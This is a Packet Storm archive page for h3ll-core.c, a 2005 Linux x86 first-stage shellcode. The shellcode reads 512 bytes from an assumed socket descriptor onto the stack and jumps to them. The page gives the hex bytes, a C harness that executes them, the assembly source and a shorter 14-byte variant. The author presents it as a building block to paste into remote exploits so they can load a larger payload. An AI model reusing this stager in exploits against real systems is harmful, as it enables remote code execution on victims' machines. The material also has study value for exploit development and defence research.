what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

h3ll-core.c

h3ll-core.c
Posted Nov 8, 2005
Authored by Charles Stevenson | Site bokeoa.com

if(read(fd,buf,512)<=2) _exit(1) else buf(); shellcode for Linux x86. h3ll-core.s is appended.

tags | x86, shellcode
systems | linux
SHA-256 | d3520474d0b54fff6d65387a6361d6638be7d0e9f057c1a62cb7801571603558

h3ll-core.c

Change Mirror Download
/* h3ll-core.c by Charles Stevenson <core@bokeoa.com> 
*
* I made this as a chunk you can paste in to make modular remote
* exploits. I use it as a first stage payload when I desire to
* follow up with a real large payload of goodness. This actually
* is a bit larger than necessary because of the error checking but
* in some cases prooves nice. For a tiny version of the same theme
* check out mcb's 14 byte (saving of 15 bytes for all you
* mathematician's out there ;). The only problem might be that his
* reads from stdin and can only reads 385 bytes less than mine. So
* If you like to go big on the shellcode use mine... otherwise here's
* mcb's (or comment out the delimited lines below to shrink mine):
*
* "\x6a\x03\x58\x31\xdb\x6a\x7f\x5a\x89\xe1\xcd\x80\xff\xe4"
*
* I assume the file descriptor is in %esi. Since that's where it
* was on the last exploit I wrote. Change the instruction to
* the appropriate register from your fndsckcode or put an int in
* there for and fd that's always the same.
*/
char hellcode[] = /* if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core */
// uncomment the following line to raise SIGTRAP in gdb
// "\xcc" // int3
// 22 bytes:
// if (read(fd,buf,512) <= 0x2) _exit(1) else buf();
"\x31\xdb" // xor %ebx,%ebx
"\xf7\xe3" // mul %ebx
"\x42" // inc %edx
"\xc1\xe2\x09" // shl $0x9,%edx
"\x31\xf3" // xor %esi,%ebx // (optional assumes fd in esi)
"\x04\x03" // add $0x3,%al
"\x54" // push %esp
"\x59" // pop %ecx
"\xcd\x80" // int $0x80
"\x3c\x02" // cmp $0x02,%al // (optional error check)
"\x7e\x02" // jle exit // (optional exit clean)
"\xff\xe1" // jmp *%ecx
// 7 bytes _exit(1) (optional _exit(1);)
"\x31\xc0" // xor %eax,%eax
"\x40" // inc %eax
"\x89\xc3" // mov %eax,%ebx
"\xcd\x80" // int $0x80
;

int main(void)
{
void (*shell)() = (void *)&hellcode;
printf("%d byte if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core\n\tNOTE: w/optional 11 bytes check and exit (recommend unless no room)\n",
strlen(hellcode));
shell();
return 0;
}

# h3ll.s by core@bokeoa.com based on some code zen-parse helped me to
# write a few years ago.. this is especially tuned for pulltheplug fu
# challenge #3 it read's 512 bytes of shellcode onto the stack and calls
# it and i also implemented some error checking!

.globl main
main:
int3 # SIGTRAP to gdb
xor %ebx,%ebx
mul %ebx
inc %edx # 1 << 9 == 512 bytes
shl $0x9,%edx #
xor %esi, %ebx # fd stored in %esi
add $0x3,%al # __NR_read
push %esp # pointer to sp
pop %ecx #
int $0x80 # count = read(fd,buf,512)
cmpb $0x2, %al # if (0x2 <= count)
jle exit # _exit(1)
jmp *%ecx # else buf()
exit:
xor %eax,%eax
inc %eax
mov %eax,%ebx
int $0x80

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close